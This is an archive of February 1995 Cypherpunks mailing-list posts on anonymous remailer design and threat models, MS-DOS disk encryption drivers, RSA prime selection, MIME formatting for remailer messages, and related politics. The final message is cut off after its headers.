> > for whatever that is worth.
> 
> I'm not sure what you mean by "matching the top of the body of messages".
> Are you referring to an encrypted reply block, which might be the same
> for two different messages to the same user?  Or are you suggesting that
> messages would have some headers or some other structures at their top
> which would be preserved through a remailer?
> 
 
No.  I was refering to your trust in packing garbage on the end of a pgp
message.  If the headers and bodies are encrypted separately, and the
remailers just tack garbage onto the end of the message, you get 12345xyz
one time, and 12345pqr the second.  Match.
 
 
> > And if Bob receivs x packets per tick, or a BIG packet every tick, how does
> > Eve trace it?
> 
> If the input to Bob really can be made constant across the whole remailer
> net then this does seem to largely protect against duplicate-message
> insertion, in conjunction with the intra-remailer encryption.  However it
> would apparently also be necessary for every remailer to send a constant
> number of packets to every other remailer.  Otherwise a bolus of
> duplicates into one remailer would all leave to go to the next remailer
> at once and would show up.  This means that the net as a whole has to
> carry a constant traffic load on all inter-node links, which could mean a
> large cost in bandwidth load.
> 
 
Your analysis, as I see it, is essentially correct.  I think that the total
load can be time-dependent, but should be even across all remailers on each
tick.  We need a lot of garbage in the net in order to cover all types of
attacks/foolish useage.
 
 
> No, of course message size standardization is a necessary step.  This has
> been recognized for 15 years.
> 
 
So why mention it in this context?
 
 
> > >          It's one thing if I send a message along with thousands of
> > >other people, and Bob gets a message along with everyone else.  But if I
> > >send 10 messages and Bob gets 10 from that batch, that fact alone can
> > >help to link us up.  So splitting my big message into 10 standard ones
> > >isn't that great if they're all sent at once.  Ideally you'd want to
> > >dribble them out at some standard rate, a rate at which you always send
> > >a message whether you have something to send or not.  But this may introduce
> > >unacceptable latency.
> >  
> > "Dribble them out at some standard rate".  Yes.  y packets per tick.  Set y
> > equal to your average number of real packets per tick, plus 3 standard
> > deviations.  Since you are chaining, the latency of you input will be less
> > than the latency of the remailernet.
> 
> OK, but chances are your average number of real packets per tick is < 1,
> e.g. if a tick is a few hours and you only send one or two messages
> a day.  So when you do need to send that 500KB GIF it's going to take a
> lot of ticks.
> 
 
But I said average plus 3 standard deviations.  If you know you are going
to send GIFs at some point, you make a point of setting you standard that
high.  BTW, I envision a tick period of 30 minutes to an hour.
 
 
> I would sum up by agreeing with several points: the need for standard
> message sizes, and for a standard rate of message output.  I am neutral
> on whether a remailer may want to super-encrypt a message to the next
> link in the chain (whether a remailer or an end user) if it happens to
> have a key handy.  I don't see any harm in this and the remailer
> software will already handle this transparently on the receiving end.
> I disagree with the idea of remailers checking signatures.  I don't
> agree that inter-node remailer encryption provides significantly more
> protection than padding.  I think that encrypted reply blocks are
> unsafe even with inter-node remailer encryption.  See Chaum's paper for
> ways that encrypted reply blocks can be used safely.  We have also had
> some suggestions here for modifications to Chaum's method.  And I don't
> see how you can arrange to receive a constant load from the net without
> a highly centralized system, which would have its own dangers.
> 
> Hal
> 
 
Hopefully, I made my positions on these matters clear.  As I said, I have
new ideas, several of which supercede these.
 
Nathan
 
 
On multiple Request-Remailing-To:'s
 
> I don't follow how requiring pgp wrappers would kill this.  Couldn't
> he create a remailing request to 10 remailers, wrap that in pgp, stick
> on a remailing request to 10 remailers, wrap that... and end up with
> the same effect?
 
> Hal
 
Yeah.  I realised this right after sending it.  Genius that I am.  I guess
you have to limit the number of remailers in the multiples to 1.  Even
then, you could end up with a remailer-based spam.  (joy)  I guess you have
to, as a matter of policy, allow 1 remailer and nothing else or any number
of others.
 
Nathan
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
iQEVAwUBLzmmLnmgMs8UcStNAQHk4Af/Qn+azQ9MDiWEbiQgGSfnn1a7w2xS2ktG
RJTEBlVXAduurz7e+DGxS4ggfvtU61QVpn/rJkM7Q5vk2gZMzdb0v6f9sMkex8ew
tFFMLf2Q9JXlahONyxiW5yLWHdOjpj18Gf4jfGWVM9DZxWwaA25l8x/qROEzg1Hi
TM04/mmF+yJVLHJLfyxSTG6d2oaXpbOMsbwwosvWc91iCTA5QqSFNpQFIRqWQE3n
UKl9+Ym9I93hfJiLL3xvnBrfZQZC26DMZUugoxTUaXfWjUiSeDlc2b0UBpSOn/VN
FTPr9C5Wa4rDC8gT8BVq4F+M4b0lVcgqijyoQhgMItvA3eZ7Vdd1iQ==
=Hh4N
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Thu, 9 Feb 95 04:09:32 PST
To: cypherpunks@toad.com
Subject: Threat models. [was: Why encrypt intra-remailernet]
Message-ID: <Pine.3.89.9502090648.I21224-0100000@lia.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


 
>    From: Nathan Zook <nzook@bga.com>
> 
>    When I say that the Mark I remailers are laughably easy to crack, I mean
>    laughably easy.
> 
> By whom?  I am hearing a general denunciation of the current remailer
> system.  These blanket denials are false on their face, because they
> are not true in every circumstance.
> 
 
By anyone with the resources to snoop up- and down- stream of all the
remailers.
 
>    The only reason that our systems are actually able to do any good is 
that
>    our threat model _is not_ an LEA--with government resources, and 
government
>    patience.
> 
> _Our_ threat model?
> 
> There is not one threat model.  Each person has their own threat model
> and their own desired level of security.  An individual also desires
> more security for some messages than others.  The current remailer
> network is good for some purposes and bad for others.
> 
> Every evaluation of security _must_ include the nature of the security
> desired, because there is no single concept called "security" which is
> the same in every situation.
> 
> Eric
 
Yes, but...  The very act of going to the trouble of using these remailers
means that you are dealing with someone powerful enough to read past forged
From/From: lines.  Does it take that much more to snoop these sites?  My
gut says no.  Everybody harps chaining.  Does snooping take more effort
than compromising?  I think it would be hard indeed to say so.
 
So if we think Eve can compromise some remailers, and/or read past
From/From: faking, we are, I believe, forced to believe that Eve can snoop
all the remailers.  Threat models need to be uniform in the power of the
opponent.
 
Nathan
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Thu, 9 Feb 95 04:11:02 PST
To: cypherpunks@toad.com
Subject: Mixmaster + T1
Message-ID: <Pine.3.89.9502090624.J21224-0100000@lia.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
 
*** Background
 
Cypherpunk remailers have been very effectively keeping the net.cops at
bay--mostly because the net.cops aren't _real_ cops.  Lance has offered a
standard that goes quite a distance towards defeating the latter opponent.
I hope that my suggestions can close the gap.  The remailers, and their
mailers, use IDEA, RSA, MD5, PGP, and D-H.
 
 
 
*** Threat Model
 
Our attacker, Eve, is a wealthy national government.  Eve has corrupted at
least some of the law enforcement agencies, but not much of the judiciary.
Contact with the remailers has not been outlawed.  Individual use of strong
crypto has not been outlawed.  ( I know this probably violates the equality
of power demand, but...)  Alice and Bob are sending each other messages
through the net, and know that they are being watched.  Eve does not have
the secret (PGP/RSA) keys of anyone she has not explicitly compromised.
 
The historical examples might be Chinese dissidents, Afgan or Nicuaraguian
freedom fighters, David Koresh, Randy Weaver, or Mary of Scotland.
 
 
 
*** Goal
 
Our goal is to help Alice and Bob carry on an extended conversation without
Eve being able to produce proof that either one of them actually sent any
real message.  This include the possibility that on occasion, theirs is the
only real message in the remailer net.  By produce I include manufacture.
Forward security for all involved is preferable.
 
 
 
*** Attack Modes
 
I believe that there are five primary modes of attack:  traffic analysizing
individual remailers, traffic analysizing the remailer net as a whole,
compromising remailers, correlating the reception of messages by Bob or
Alice with their later outside actions, and fabricating messages from Alice
to Bob.
 
 
 
*** Basic Abilities
 
Eve knows all of our protocals, and can convince the Internet that she is
anyone.  She records all traffic into or out of all remailers, as well as
Alice and Bob.  She runs most of the remailers, and can temporarily and
selectively block traffic through the remailers.
 
 
 
*** Attack Methods.
 
I will not redetail the standard attacks which include flushing, spam-
copying, single copying (stuttering), size matching, or We Dai.  I will,
however, detail certain attacks that I believe are either new or have not
been generally discussed.
 
 
** Fabricating Evidence
 
As we have seen with our own government, lack of evidence is a condition
that governments can correct by fiat.  (Randy Weaver)  Alice has to be able
to prove that a message on the Internet "from" her to a remailer did not in
fact originate with her.
 
 
** Sandwiching
 
(This attack may not be possible at this time.  But it is hard to know...)
If Eve owns remailers on either side of another, she may seed "random" data
with particular data in order to determine what IDEA key was used on the
data.
 
 
** Remailer Spoofing
 
Eve can attempt to process messages on a remailer's behalf.
 
 
** Message Body Matching
 
If a copy of a message can be sent through, the first part of the body
(following the headers) can be compared.  If random garbage has been tacked
on by the other remailer, it will be distinguished.  
 
 
 
*** Definitions for Standard
 
Remailers and mailers together are generically called users.  Alice is
sending a message to Bob.
 
All remailers operate on ticks.  At certain GMTs, all remailers process all
of their accumulated messages, then forward them, holding some over for the
next batch.
 
The term message refers to either the final message to be sent to Bob, or
its encrypted counterparts--including padding.  A header is a set of
communications to a remailer, or to Bob.  A message packet is a message
with all of its headers.  A T1 packet is the collection of all message
packets going from one user to another on a given tick, with additional
header information.
 
 
 
*** Standard for Exchanging T1 Packets
 
T1 packets are IDEA encrypted.  The key is exchanged through a DH exchange
which takes place inside previous T1 packets.  The keys are DHed so that
the compromise of one T1 packet does not lead to the compromise of all
subsequent packets.
 
In order to establish the original IDEA keys, a sender would contact a
reciever with a special "origination" packet request.  Such requests would
intiate contact between users, or could be used to establish secure IDEA
tick keys in the event of a failed connection, or compromised key.  This
packet includes a disposable RSA key, which the receiver would use to PGP a
disposable RSA key in return.  IDEA keys for future packets could be passed
through these RSA keys.  The RSA keys would themselves be signed by the
public key associated with each user.
 
 
 
*** The Structure of a T1 Packet
 
T1 packets would include the DH key exchanges for future ticks, a
timestamp, all message packets destined for the reciever this tick, an MD5
of the previous T1 packet recieved (decrypted), and an MD5 of the rest of
the message, as a checksum.  This could be turned into a signature,
possibly with the timestamp.  If the MD5 from the previously recieved
packet matches, the copy of the old sent T1 packet is destroyed.  If it is
bad, the old packet is resent, with a different key.
 
 
 
*** Selection of Message Packets to a User
 
Mailers specify a number of message packets that they receive each tick
from various remailers.  If a remailer has more messages packets for a
mailer on a given tick than the mailer receives, the extras are held over,
and a notice is sent so that the mailer can determine if he should raise
his limit.  If the number of "real" packets to a user is below his limit,
dummy packets are sent to him through other remailers, on a sliding scale.
 
A user sends the same number of message packets to each remailer every
tick.  There is a minimum number of message packets that a remailer will
send to each other remailer each turn.
 
/* This eliminates the ability to trace a flood of messages, even if they
all took the same path. */
 
Messages being held are flaged with the number of ticks that they have been
held.  There is a maximum number of ticks that a message packet can be held.
 
Mailers send the same number of message packets each tick to each remailer
that they might use.
 
 
 
*** Use of Dummy Message Packets
 
Dummy message packets are used to pad traffic.  Dummy messages are always
sent at least to third party remailers.  The distribution of these third
parties is random.
 
/* If Eve runs some remailers, she can immediately eliminate dummy message
sent to her machines.  But if these do not originate in the machine that
sent the message, her gain is much weakened.  If Eve controls most of the
remailers, it may be necessary to send dummy messages through three
remailers in order to obscure traffic flow.  If the distrubtion were flat,
real messages would stand out. */
 
 
 
*** The Structure of a Message Packet
 
All message bodies are standard sized, and have a standard number of
standard sized headers.  The reconstitution of oversized messages is
handled by Bob's client.  The division of oversized messages is handled by
Alice's client.  An exception is made for mail-to-news gateways, to
reconstitute the oversized message at the last remailer.  Such exceptions
include a rough check to insure that the message is either valid ASCII
armour, or some language.
 
The header to a remailer includes the forwarding address, a timestamp, and
the IDEA keys to be used on each other header, as well as the body.  (Each
is different.  See below.) After decrypting, the headers are circulated.
When creating the timestamp for a header number n, Alice uses the time of
the nth tick coming.
 
The top header itself is RSAed with the user's public key.
 
/*  If Eve manages, though a sandwich attack, to divine the idea key used
on a header, she can use this to trace the message.  If we include only the
key and an increment, she can get this information if she has two remailers
before the good one.  If we include the key, an increment, and a
permutation of the headers, she can guess the key.  */
 
The header for Bob includes an MD5 of the message, flags in case the
message is oversized, and a timestamp.
 
 
 
*** Elimination of Duplicate Packets
 
An MD5 record is kept of every message, every header, and every T1 packet
recieved or sent for M ticks.  M is related to the number of headers and
the maximum number of ticks that a message is held--with room for error.
If a match is found, the entire packet is rejected.  If a message arrives
with a timestamp older than M ticks, it is rejected.  If a message arrives
with a timestamp in the future, it is held until that time.
 
 
 
*** Incorporation of Encrypted Reply Blocks
 
Encrypted Reply Blocks would be the PGPed version of a header set.  The
receiver would know the IDEA keys used on the body, and the order, so he
could reverse the operation.  The keys could even be included in the final
header.  It is not possible in this system to allow multiple encrypted
reply block responses without possible compromise of the recipient.
 
 
 
*** Weaknesses
 
Clients are required to be as sophisticated as hosts.  Clients must be able
to handle lots of dummy mail.  Both hosts and clients must have access to
good, secure, random data sources.  Hosts must be able to protect their
data for a period of hours or days.  Hosts and clients need to be able to
protect their DH information.
 
Nathan
 
Flame on!!
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
iQEVAwUBLzmk/XmgMs8UcStNAQEQQQgAkJyeh2vgOnsbVzuHrqGKVPE0pIoh37ms
DtMxD7mJVMp40fGlQJmk8dT3WeVUpgeFIvJxeNvMZ86jyN51smZkjqUBNWFhJikT
HBnAlDuf82g1GbuhPsR9J2vMTtTHcsfs+ytTWDp2g+xr1nWHngki4wBjPy2oOCP9
dxu5vamUnDy0oFatMmGxIZyN9jTzB7NynaXVLkDWL3Hh8amUwyW9nq7LGQJ8Oiuh
2xY4uizxJ+/SjxnATxUznT9i099xC3ClpRGX1n/3fdXY5Mu5MAJoRO6sjL5Fakz4
3i0qWNlv8ZJCqCetSqnQrINFFd6bpDhiAz5/CU4kQ9/HtStIVl/88A==
=kziG
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Thu, 9 Feb 95 05:31:27 PST
To: cypherpunks@toad.com
Subject: Best encryption device driver for MS-DOS?
Message-ID: <m0rcYxl-0004IOC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


Being in the consulting business, I often write prototype software for
clients in Visual Basic as proof-of-concept and also to make sure I
understand the client's needs before I accept a project.  On occasion,
I have to leave my laptop unattended on someone's desk while I go into
meetings with senior management and try to convince them that I know what
I'm talking about and that I'm worth whatever (exorbitant to them) I'm
asking to do their application for them.  I also do volunteer programming
for several volunteer organizations, and it's the same situation - unattended
laptop while I wander off and chat with management to tell them why it
will take so long to do the impossible. ;)

As you might imagine, I have a full suite of programming tools on the laptop,
including MS Office Pro and VB Pro, both of which are worth about $500
apiece - I'd sure hate to lose them to a malicious cracker, or someone who
would like a personal copy of my source code for their own use, or who just
wants to "borrow" my secret key for awhile.

What do people recommend as the solution for this?  Some sort of IDEA-based
or triple-DES-based device driver would seem to be the answer to this, but
I'm not sure which is the "best" (most reliable, fastest, easiest to set up)
one to use.  I like the sound of Michael Sattler's encryption driver for the
Mac, but alas, I'm running MS-DOS :(

Also, if anyone has any suggestions for a similar driver for Linux, I'd
appreciate it - thanks!
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

Cop: "How many beers have you had tonight, bro?"
Suspect: "Seventy."  -- from the TV show "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Thu, 9 Feb 95 06:02:54 PST
To: root@einstein.ssz.com (root)
Subject: Re: Best encryption device driver for MS-DOS?
In-Reply-To: <199502091343.HAA04180@einstein.ssz.com>
Message-ID: <m0rcZRT-0004IhC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> You leave your laptop turned on and out of your immediate reach? Geesh.
> I would NEVER leave my laptop anywhere that I didn't have it in eyeshot. It
> was the whole reason I got one.

Well, it's rather tacky to turn off the laptop, unplug it, etc., just to
lug it into a boardroom.  Not impressive.

> > As you might imagine, I have a full suite of programming tools on the laptop,
> > including MS Office Pro and VB Pro, both of which are worth about $500
> > apiece - I'd sure hate to lose them to a malicious cracker, or someone who
> > would like a personal copy of my source code for their own use, or who just
> > wants to "borrow" my secret key for awhile.
> >
> Business must be good, you are more worried about somebody stealing a $500
> dollar program than a several thousand dollar laptop?

Oh, I'm not worried about the laptop walking off, I'm worried about the
software I've written walking off...

> > What do people recommend as the solution for this?  Some sort of IDEA-based
> > or triple-DES-based device driver would seem to be the answer to this, but
> > I'm not sure which is the "best" (most reliable, fastest, easiest to set up)
> > one to use.  I like the sound of Michael Sattler's encryption driver for the
> > Mac, but alas, I'm running MS-DOS :(
> > 
> Try Lo-Jak so that when your laptop goes a wanderin' you can find it....:)

I've never had anyone even attempt to rip off the laptop, but I've had people
ask for "free samples" of the prototype code...
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

Cop: "How many beers have you had tonight, bro?"
Suspect: "Seventy."  -- from the TV show "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Thu, 9 Feb 95 05:48:21 PST
To: ecarp@netcom.com
Subject: Re: Best encryption device driver for MS-DOS?
In-Reply-To: <m0rcYxl-0004IOC@s116.slcslip.indirect.com>
Message-ID: <199502091343.HAA04180@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> Being in the consulting business, I often write prototype software for
> clients in Visual Basic as proof-of-concept and also to make sure I
> understand the client's needs before I accept a project.  On occasion,
> I have to leave my laptop unattended on someone's desk while I go into
> meetings with senior management and try to convince them that I know what
> I'm talking about and that I'm worth whatever (exorbitant to them) I'm
> asking to do their application for them.  I also do volunteer programming
> for several volunteer organizations, and it's the same situation - unattended
> laptop while I wander off and chat with management to tell them why it
> will take so long to do the impossible. ;)
>
You leave your laptop turned on and out of your immediate reach? Geesh.
I would NEVER leave my laptop anywhere that I didn't have it in eyeshot. It
was the whole reason I got one.
 
> As you might imagine, I have a full suite of programming tools on the laptop,
> including MS Office Pro and VB Pro, both of which are worth about $500
> apiece - I'd sure hate to lose them to a malicious cracker, or someone who
> would like a personal copy of my source code for their own use, or who just
> wants to "borrow" my secret key for awhile.
>
Business must be good, you are more worried about somebody stealing a $500
dollar program than a several thousand dollar laptop?
 
> What do people recommend as the solution for this?  Some sort of IDEA-based
> or triple-DES-based device driver would seem to be the answer to this, but
> I'm not sure which is the "best" (most reliable, fastest, easiest to set up)
> one to use.  I like the sound of Michael Sattler's encryption driver for the
> Mac, but alas, I'm running MS-DOS :(
> 
Try Lo-Jak so that when your laptop goes a wanderin' you can find it....:)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joshua geller <joshua@dee.retix.com>
Date: Thu, 9 Feb 95 08:13:00 PST
To: slowdog@wookie.net
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <Pine.LNX.3.91.950209105922.8309A-100000@chewy.wookie.net>
Message-ID: <199502091612.IAA25397@sleepy.retix.com>
MIME-Version: 1.0
Content-Type: text/plain



>   On Thu, 9 Feb 1995, Robert Rothenburg Walking-Owl wrote:

>   > I heard yesterday that someone in the House of Representatives proposed 
>   > an amendment to the new crime bill which was soundly defeated it. Turns 
>   > out the Amendment was worded exactly as the Fourht Amendment in the Bill 
>   > 'o Rights. Apparently many a congressman/woman has egg on their face...

>   Yes indeed, in response to the H666 bill. The Dems placed up for vote the 
>   text of the 4th Amendment without attributing it to be such. It was 
>   defeated. Dems then immediately took to the floor of the House accusing 
>   the Repubs of tryingto dismantle the Constitution.

so is there a list of names of the people who voted against it? I use
the term "people" very loosely.

actually though, both the democrats and the republicans consider parts
of the constitution to be obsolete. they just differ amongst themselves
as to which part. 

I wish someone would find the elixir of youth and feed it to barry
goldwater.

josh







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 9 Feb 95 08:41:47 PST
To: cypherpunks@toad.com
Subject: Re: Lucky primes--third time's the charm?
In-Reply-To: <Pine.3.89.9502090512.B21224-0100000@lia.bga.com>
Message-ID: <199502091641.IAA12454@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Nathan Zook <nzook@bga.com> writes:

>-----BEGIN PGP SIGNED MESSAGE-----
> 
>The algorithm I posted the second time works, (nice improvement, eh?) but
>is likely to take several thousand years to complete.  And when it does, we
>can expect weak primes.  The enhancement I propose should fix that.
> 

I did not realize before that p was an output of your algorithm, rather
than an input.  That explains better what you were trying to do.  You are
in effect trying to search for a prime such that e's multiplicative
inverse has a lot of 0's.

This looks like it will work pretty well, with the caveat as we discussed
before that going too far with this could make searching for the primes
easier.  But the only obvious attack would be to try to reproduce your
prime-finding algorithm to find a p which divides the modulus n, and that
is basically a sqrt(n) algorithm, which is far from the worst-case attack
we face.  The search space can be reduced by a considerable factor before
it becomes competitive with modern algorithms.

I guess another point is that if i is 2 or 4 then p itself will likely be
0-rich and conceivably there could be some attacks against a modulus
known to be the product of two 0-rich primes even when the primes are not
weak in the normal sense.  (p = (ed-1)/i+1, d is 0-rich, and e has only
2 bits on so ed is likely also to be somewhat 0-rich; dividing by i is
just a shift right if i is 2 or 4, and adding 1 won't make much
difference.)

Restricing i to other numbers would still give p a simple arithmetical
relation to a 0-rich number (i=3 --> p*3 is 0-rich).  Maybe you could
choose a d such that d itself was 0-rich while ed happens not to be
0-rich; this might feel safer since p would have less of an
arithmetical relation to a 0-rich number.

(Admittedly, I don't know of any factoring attacks directly applicable to
0-rich factors but there is at least a superficial similarity to weak
primes and that suggests caution.)

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Philippe Nave <pdn@drmail.dr.att.com>
Date: Thu, 9 Feb 95 07:58:30 PST
To: ecarp <ecarp@netcom.com>
Subject: Re: Best encryption device driver for MS-DOS?
Message-ID: <2F3A49A4@mspost.dr.att.com>
MIME-Version: 1.0
Content-Type: text/plain



Ho, cyphernauts!

My $.02 votes for SecureDevice as an MS-DOS encryption mechanism because:
  1) It works within a file (or files) rather than requiring a dedicated
     hard disk partition; you can put up and take down encrypted "drives"
     without wiping out the whole disk drive and repartitioning. (VERY
     handy when you suddenly need to increase the size of your "drive"
     *RIGHT NOW*).
  2) It keeps a regular DOS directory structure within the "drive" file;
     you set up the "drive" one time and then just throw stuff in it at
     will. You can encrypt single files a variety of ways, but then you
     have to manage them all - this way, you just chuck 'em in the safe
     together.
  3) In a pinch, you can move the whole encrypted "drive" from place to
     place - since it's a self-contained data file and is encrypted
     throughout, you can FTP it all over the place as a binary file
     without hurting it.

The only time I've gotten in trouble with it was when I had SmartDrive 
turned
on for the encrypted "drive" and went down hard; now, I have a SMARTDRV -D:
or whatever in my AUTOEXEC so that SmartDrive won't try to buffer I/O to
the encrypted drive.

My one and only gripe - it won't work under Windows NT 3.5 ! I have to boot
DOS (blech!) to get at the encrypted drive. (Hint, Hint, Hint....)

    -Philippe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@wookie.net>
Date: Thu, 9 Feb 95 06:07:31 PST
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502090633.WAA08858@netcom2.netcom.com>
Message-ID: <Pine.LNX.3.91.950209090753.8172B-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Feb 1995, Timothy C. May wrote:

> As scary as S.314 is, I'm not sure it's likely to pass. Unlike the
> Digital Telephony Bill, which was on greased skids, this  one seems to
> have come out of left field. I could be wrong on this, and maybe it's
> got a lot of sponsors, but it sounds like just another Bill that will
> die in committee or fail on the floor.

I would not count on this. The goal of the bill is to combat 
indecency/pornography/onscenity online - the kind of things pols LOVE to 
vote for.


- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 9 Feb 95 09:10:03 PST
To: cypherpunks@toad.com
Subject: Re: MIME based remailing commands
In-Reply-To: <ab5f62d802021004dd65@[137.110.24.250]>
Message-ID: <199502091709.JAA15742@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

lcottrell@popmail.ucsd.edu (Lance Cottrell) writes:
>With Mixmaster, everything is hidden inside the encrypted and ascii armored
>message structure.
 
>I use the :: token to let the remailer know that this is a remailer message
>of some sort. The Remailer-Type will eventually be used to indicate the
>version that created the message. It would be easy to add support for MIME.
>It would just replace the token and version number.
 
>All remailing instructions are inside the ascii armor.
>Note that the block of ascii armor is allways exactly the same length.
 
>::
>Remailer-Type: 2.0
 
>-----BEGIN REMAILER MESSAGE-----
>hQCMAgbmF1BLzawNAQP/RFw2/UagugMFPlnJ94KLmhaxDoplzAhNBCxuFRL2fosL
>V1YnFd2XVckJJ6vTe6DB+POO+V7HEdXkp3sWtjb56Am+/B+tM1TdeC6NPNV4g5PC
>[...]

Ah, I see how you are doing it.  Having re-read your docs, I gather
that when un-armored the file is in an encrypted binary format, and
when decrypted at least the non-header portion of the file is still
binary?  I think this is a good way to do it; it addresses the point
Eric made recently about size expansion when an armored file is
encrypted at each step.

The one thing I would mention is that "::" was not originally intended
as an indication that the message was to be remailed.  Rather, this was
simply a "header pasting token" which could be used to move a few lines
from the body up into the header for those people who can't set header
fields on outgoing mail.  Then the presence of "Anon-To:" or whatever
in the header is what actually causes the action.  So you don't need to
use "::", you can just set your headers directly and get the same
effect.  (This is not to say you need to do it like this, just that
that is how the original design that Eric created worked.)
 
If you did want to follow this model, you could think about using a
MIME header to indicate the type of the message contents rather than
the "::".  Another alternative would be to use a different special
field in the mail header, like perhaps your "Remailer-Type: 2.0", but
I'm not sure that a new top-level header field is the right place for
this.  It looks to me like most of the standard headers deal more with
moving the message around rather than with telling what would be done
with it on receipt.  It's kind of a fine line but it looks to me like
more of a job for a MIME content type since that is really what it is
for.  You could use something like:
 
MIME-Version: 1.0
Content-Type: application/remail; version="2.0"

or

MIME-Version: 1.0
Content-Type: application/remail-mark-2
 
Then the rest of the message could look just as you have it.  Or, to use
a little more of the existing standard, you could add:
 
Content-Transfer-Encoding: base64
 
and take out your BEGIN and END lines since it looks like you are using
base64, although the augmented kind that PGP uses with the CRC at the
end; you'd have to lose the CRC in that case.  (I wonder if PGP will do
that in the MIME-PGP integration draft that is supposedly being worked
on.)

One question is, how do you actually send your messages in the
mixmaster client and servers?  Do you go directly to sendmail, or do
you use a user agent like /bin/mail?  If the former then it doesn't
seem like it would be too hard to add these header fields.  On the
receiving end then hopefully also it would not be much harder to match
the Content-Type: string than the one you are using.

The advantage, again, is that to a considerable extent this kind of
application is exactly what MIME was planning for with the "application"
content-type.  This lets you mark the contents of the message in a
standard way.  And you are already using something very close to the
base64 encoding that MIME specifies.  So this does seem like a good
opportunity to go with the internet mainstream by following this
standard.  If this seems like something you want to do I'm sure our MIME
experts here can tell how to define a new content type.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLzpMORnMLJtOy9MBAQHWTwIA5k+6zO6/mMagKrNZELu7gHO2USlPnVGI
+SnIaj1jGtkzaodyIaEiUptAB4v5xfX8Lg7f+lcGzJYcEGrIi3+UPQ==
=NK01
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@wookie.net>
Date: Thu, 9 Feb 95 06:09:13 PST
Subject: Re: S314 and potential hell-raising
In-Reply-To: <199502090715.XAA14870@alkahest.isas.com>
Message-ID: <Pine.LNX.3.91.950209090919.8172C-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Feb 1995, joshua geller wrote:

> there's room for another organization I think. there are, in my opinion,
> two reasons why the NRA is as effective as it is: it has a single issue
> that it concerns itself with and it never compromises.
> 
> so what, in very few words and as clearly as possible, is our issue?

I don't know what your issue is, but a small group of people are at the 
moment formulating the beginnings of a new "group" of sorts with a very 
specific agenda in mind.

Which is an utterly obscure and non-descriptive thing to say. But hold 
on. We should have an initial announcement ready, I hope, shortly.


- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpp@markv.com
Date: Thu, 9 Feb 95 09:33:50 PST
To: cypherpunks@toad.com
Subject: My pgp emacs code in ftp://ftp.markv.com/pub/jpp/pgpelisp/*
Message-ID: <9502090927.aa02278@hermix.markv.com>
MIME-Version: 1.0
Content-Type: text/plain


  I have been hacking yet another emacs to pgp interface for some time
now.  I am happy with the current state of affairs, and am releasing
it for general consumption.  It supports automatic decrypting,
signing, signature checks and interfaces nicely with rmail.el and
sendmail.el.

  Also it includes a set of remailer functions which parse the ping
reports from Raph Levien <raph@CS.Berkeley.EDU> and give you a simple
interface to chaining a bunch of remailers together.

  The code is liscense free; use it, sell it, hack it up, export it,
claim it is yours, I don't care.  Feel free.  (How could I stop you
any way?  I suspect that number theory, and complexity theory *are*
the real natural rights.)

  My code is in ftp://ftp.markv.com/pub/jpp/pgpelisp/*

  It is not yet very well packaged.  Read 2b.emacs.  I still want to
clean up the remailer stuff a little before I spend time packaging.
(C-C commands, reply block building, and estimates of a chain's
reliability, (support for ghio and julf {pseudo, ano}nyms?))

  Unfortuneately my net connection, and means of support here at markv
will likely soon be gone :(...  This may be the last chance I have to
distribute or work on this code for a while.  If the code impreses you
with my ability to hack, you might want to make me a job offer :) Or
point me to jobs.  OTOH, if my ability to hack doesn't impress you,
please be quiet until I do get another job :).

j'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pdlamb@iquest.com (Patrick Lamb)
Date: Thu, 9 Feb 95 07:37:05 PST
To: cypherpunks@toad.com
Subject: Re: Best encryption device driver for MS-DOS?
Message-ID: <199502091537.JAA13636@vespucci.iquest.com>
MIME-Version: 1.0
Content-Type: text/plain


